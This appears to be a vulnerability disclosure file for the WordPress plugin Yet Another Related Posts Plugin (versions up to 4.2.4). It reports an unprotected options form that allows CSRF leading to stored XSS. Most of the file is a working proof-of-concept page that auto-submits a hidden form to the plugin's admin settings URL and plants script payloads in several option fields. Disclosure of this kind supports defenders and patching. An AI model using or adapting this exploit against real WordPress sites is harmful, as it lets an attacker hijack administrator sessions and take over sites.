-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathYet Another Related Posts Plugin (YARPP) CSRF.txt
73 lines (65 loc) · 3.6 KB
/
Yet Another Related Posts Plugin (YARPP) CSRF.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
Yet Another Related Posts Plugin (YARPP) CSRF -> XSS -> RCE
Homepage:
https://wordpress.org/plugins/yet-another-related-posts-plugin/
Affected Version:
<= 4.2.4
Description:
'Yet Another Related Posts Plugin' options can be updated with no token/nonce protection which an attacker may exploit via tricking website's administrator to enter a malformed page which will change YARPP options, and since some options allow html the attacker is able to inject malformed javascript code which can lead to code execution/administrator actions when the injected code is triggered by an admin user.
injected javascript code is triggered on any post page.
Vulnerability Scope:
XSS
RCE ( http://research.evex.pw/?vuln=14 )
Authorization Required:
None
Proof of Concept:
<body onload="document.getElementById('payload_form').submit()" >
<form id="payload_form" action="http://wpsite.com/wp-admin/options-general.php?page=yarpp" method="POST" >
<input type='hidden' name='recent_number' value='12' >
<input type='hidden' name='recent_units' value='month' >
<input type='hidden' name='threshold' value='5' >
<input type='hidden' name='weight[title]' value='no' >
<input type='hidden' name='weight[body]' value='no' >
<input type='hidden' name='tax[category]' value='no' >
<input type='hidden' name='tax[post_tag]' value='consider' >
<input type='hidden' name='auto_display_post_types[post]' value='on' >
<input type='hidden' name='auto_display_post_types[page]' value='on' >
<input type='hidden' name='auto_display_post_types[attachment]' value='on' >
<input type='hidden' name='auto_display_archive' value='true' >
<input type='hidden' name='limit' value='1' >
<input type='hidden' name='use_template' value='builtin' >
<input type='hidden' name='thumbnails_heading' value='Related posts:' >
<input type='hidden' name='no_results' value='<script>alert(1);</script>' >
<input type='hidden' name='before_related' value='<script>alert(1);</script><li>' >
<input type='hidden' name='after_related' value='</li>' >
<input type='hidden' name='before_title' value='<script>alert(1);</script><li>' >
<input type='hidden' name='after_title' value='</li>' >
<input type='hidden' name='show_excerpt' value='true' >
<input type='hidden' name='excerpt_length' value='10' >
<input type='hidden' name='before_post' value='+<small>' >
<input type='hidden' name='after_post' value='</small>' >
<input type='hidden' name='order' value='post_date ASC' >
<input type='hidden' name='promote_yarpp' value='true' >
<input type='hidden' name='rss_display' value='true' >
<input type='hidden' name='rss_limit' value='1' >
<input type='hidden' name='rss_use_template' value='builtin' >
<input type='hidden' name='rss_thumbnails_heading' value='Related posts:' >
<input type='hidden' name='rss_no_results' value='No Results' >
<input type='hidden' name='rss_before_related' value='<li>' >
<input type='hidden' name='rss_after_related' value='</li>' >
<input type='hidden' name='rss_before_title' value='<li>' >
<input type='hidden' name='rss_after_title' value='</li>' >
<input type='hidden' name='rss_show_excerpt' value='true' >
<input type='hidden' name='rss_excerpt_length' value='10' >
<input type='hidden' name='rss_before_post' value='+<small>' >
<input type='hidden' name='rss_after_post' value='</small>' >
<input type='hidden' name='rss_order' value='score DESC' >
<input type='hidden' name='rss_promote_yarpp' value='true' >
<input type='hidden' name='update_yarpp' value='Save Changes' >
</form>
</body>
Fix:
update to the latest version.
Timeline:
Notified Vendor - No Reply
Notified Vendor Again- No Reply
Publish Disclosure